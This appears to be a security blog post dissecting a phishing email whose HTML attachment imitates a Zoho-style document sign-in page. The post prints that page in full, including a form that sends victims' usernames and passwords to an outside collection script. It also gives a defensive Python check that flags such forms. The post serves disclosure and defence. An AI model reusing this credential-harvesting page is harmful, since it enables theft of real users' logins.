Phishing, Dolphin Detectors and Office 365


This is an interesting phishing email - the attachment is HTML and reads thus:

<!DOCTYPE html>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<html>
<head>
<link href="https://css.zohostatic.com/iam/M_3693668/v2/components/css/signin.css" type="text/css" rel="stylesheet"/>
<link href="https://css.zohostatic.com/iam/M_3693668/v2/components/css/flagStyle.css" type="text/css" rel="stylesheet" defer/>
<meta name="robots" content="noindex, nofollow"/>
<meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=no" />
<title>Document Sharing</title>
</head>
<body>
<div class="bg_one"></div>
<div class="Alert"> <span class="tick_icon"></span> <span class="alert_message"></span> </div>
</div>
<div class="signin_container">
<div class="signin_box" id="signin_flow">
<!-- <div class='zoho_logo ZohoSupport'></div> -->
<div id="signin_div">
<form name="login" id="login" action="https://dolphindetectors.com/@33/maring.php" method="post" validate >
<div class="signin_head">
<span id="headtitle">Sign in</span>
<span id="trytitle"></span>
<div class="service_name">to access <span>Document</span></div>
<div class="fielderror"></div>
</div>
<div class="fieldcontainer">
<div class="searchparent" id="login_id_container">
<div class="textbox_div" id="getusername">
<span>
<input id="login_id" placeholder="" value="[email protected]" type="email" name="username" class="textbox" required="" autofocus autocapitalize="off" autocomplete="email" autocorrect="off" tabindex="1" />
<span class="doaminat hide" onclick="enableDomain()">@</span>
<div class="textbox hide" id="portaldomain">
</div>
<div class="fielderror"></div>
</span>
</div><div class="textbox_div">
<input id="password" placeholder="Enter password" name="password" type="password" class="textbox" required="" autofocus autocapitalize="off" autocomplete="password" tabindex="2" autocorrect="off" />
<span class="icon-hide show_hide_password" onclick="showHidePassword();"></span>
<div class="fielderror"></div>
</div>
</div>
<div class="textbox_div" id="mfa_device_container">
<div class="devices">
<select class='secondary_devices' onchange='changeSecDevice(this);'></select>
<div class="deviceparent">
<span class="deviceinfo icon-device"></span>
<span class="devicetext"></span>
</div>
</div>
</div>
 

<button class="btn blue waitbtn" id="waitbtn">
<span class="loadwithbtn"></span>
<span class="waittext">Waiting for approval</span>
</button>
</div>

<div id="problemsigninui"></div>
<button class="btn blue" id="nextbtn" tabindex="3" type="submit"><span>Open Document</span></button>
</form>
<div id="recovery_container">
<div class="signin_head recoveryhead">
<table id="recoverytitle"><span class='icon-backarrow backoption' onclick='goBackToProblemSignin()'></span><span class="rec_head_text">Can&#39;t access your mobile device?</span></table>
</div>
<div id='recoverymodeContainer'></div>
<div class='recoverymodes'>

<div class="options contact_support">
<div class="img_option icon-support"></div>
<div class="option_details">
<div class="option_title">Contact Support </div>
</div>
</div>
</div>
<div class="btn greytext" ></div>
</div>
<div>
</div>
<div class="line"></div>
</div>
</div>
<div class="rightside_box">
<div class="mfa_panel">
<div class="product_img" id="product_img"></div>
<div class="product_head">Secure document delivery service</div>
<div class="devicedetails"><span class="deviceicon icon-device"></span><span class="devicetext"></span></div>
<div class="devices"><select class="secondary_devices_right" onchange="changeSecDevice(this);"></select></div>
<div class="product_text">Our security service shield and make your document distribution easier and faster.</div>
</div>
</div>
</div>
</div>

</body>
</html>

In this case we have substituted the email with [email protected], but you can see that they send the user to dolphindetectors.com, where their data is passed on to someone. Below is the attached HTML form.

We have notified the owner of the website, Microsoft and Google.
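A triage check that a mail gateway or analyst could run over HTML attachments like this one, as an added example (not code from the original post): it flags any form that holds a password field and posts to an absolute URL, and lists the asset domains the page borrows its styling from. The function names and the naive two-label domain comparison are assumptions made for the example, and the sample input is a constructed reduction of the attachment above.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class FormAudit(HTMLParser):
    """Collect form targets, password fields and external asset hosts."""
    def __init__(self):
        super().__init__()
        self.forms = []            # one dict per <form>
        self.asset_hosts = set()   # hosts serving CSS, scripts or images
        self._open = None          # form currently being parsed

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open = {"action": a.get("action") or "",
                          "method": (a.get("method") or "get").lower(),
                          "password": False}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            if (a.get("type") or "").lower() == "password":
                self._open["password"] = True
        elif tag in ("link", "script", "img"):
            host = urlparse(a.get("href") or a.get("src") or "").hostname
            if host:
                self.asset_hosts.add(host)

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def base_domain(host):
    # Assumption: last two labels stand in for a public-suffix lookup.
    return ".".join(host.split(".")[-2:])

def triage(html):
    """Return one finding per password form that posts to a remote host."""
    audit = FormAudit()
    audit.feed(html)
    findings = []
    for form in audit.forms:
        host = urlparse(form["action"]).hostname
        if form["password"] and host:
            styled = {base_domain(h) for h in audit.asset_hosts} - {base_domain(host)}
            findings.append({"post_host": host, "method": form["method"],
                             "styled_from": sorted(styled)})
    return findings

# Constructed sample: the attachment reduced to the tags that matter.
SAMPLE = '''<head><link href="https://css.zohostatic.com/iam/M_3693668/v2/components/css/signin.css" rel="stylesheet"/></head>
<body><form action="https://dolphindetectors.com/@33/maring.php" method="post">
<input type="email" name="username"/><input type="password" name="password"/>
<button type="submit">Open Document</button></form></body>'''
```

A non-empty `styled_from` list means the page takes its look from one domain while sending credentials to another, which is the pattern in this attachment.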

 


 

[Rendered attachment: "Document Sharing" sign-in form]